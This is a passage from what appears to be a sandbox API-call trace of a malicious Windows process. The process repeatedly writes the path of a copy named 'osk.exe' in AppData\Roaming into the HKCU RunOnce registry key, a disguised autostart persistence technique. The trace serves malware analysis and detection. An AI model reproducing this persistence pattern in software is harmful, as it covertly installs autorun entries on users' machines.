lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.599] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.599] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.599] RegCloseKey (hKey=0x280) returned 0x0 [0080.600] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.600] SetTimer (hWnd=0x20280, nIDEvent=0x2081, uElapse=0xa, lpTimerFunc=0x0) returned 0x2081 [0080.600] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.611] TranslateMessage 
(lpMsg=0x33f7fc) returned 0 [0080.611] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.611] KillTimer (hWnd=0x20280, uIDEvent=0x2081) returned 1 [0080.611] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.611] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.611] IUnknown:Release (This=0x787518) returned 0x1 [0080.612] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.612] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.612] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.612] FileSystemObject:IUnknown:Release 
(This=0x2b53a00) returned 0x1 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.612] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.612] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6 [0080.612] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.612] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7 [0080.612] FileSystemObject:IDispatch:Invoke 
(in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.613] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6 [0080.613] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.613] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.613] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.613] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.614] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 
61 [0080.614] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.614] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.614] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.614] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.614] RegCloseKey (hKey=0x280) returned 0x0 [0080.614] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.614] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.615] SetTimer (hWnd=0x20280, nIDEvent=0x2082, uElapse=0xa, lpTimerFunc=0x0) returned 0x2082 [0080.615] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.626] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.626] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.626] KillTimer (hWnd=0x20280, uIDEvent=0x2082) returned 1 [0080.627] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.627] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.627] IUnknown:Release (This=0x787518) returned 0x1 [0080.627] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.627] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.627] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.627] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, 
Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.628] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.628] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0080.628] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.628] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x8 [0080.628] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.629] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0080.629] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.629] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.629] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.629] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.629] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.629] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.629] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.629] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.630] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.630] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.630] RegCloseKey (hKey=0x280) returned 0x0 [0080.630] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.630] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.630] SetTimer (hWnd=0x20280, nIDEvent=0x2083, uElapse=0xa, lpTimerFunc=0x0) returned 0x2083 [0080.630] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.652] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.652] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.652] KillTimer (hWnd=0x20280, uIDEvent=0x2083) returned 1 [0080.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.652] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.653] IUnknown:Release (This=0x787518) returned 0x1 [0080.653] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.653] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.653] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.654] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) 
returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.654] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0080.654] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.654] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x9 [0080.654] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.655] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0080.655] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.655] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.655] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.655] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.655] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.655] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.656] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.656] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
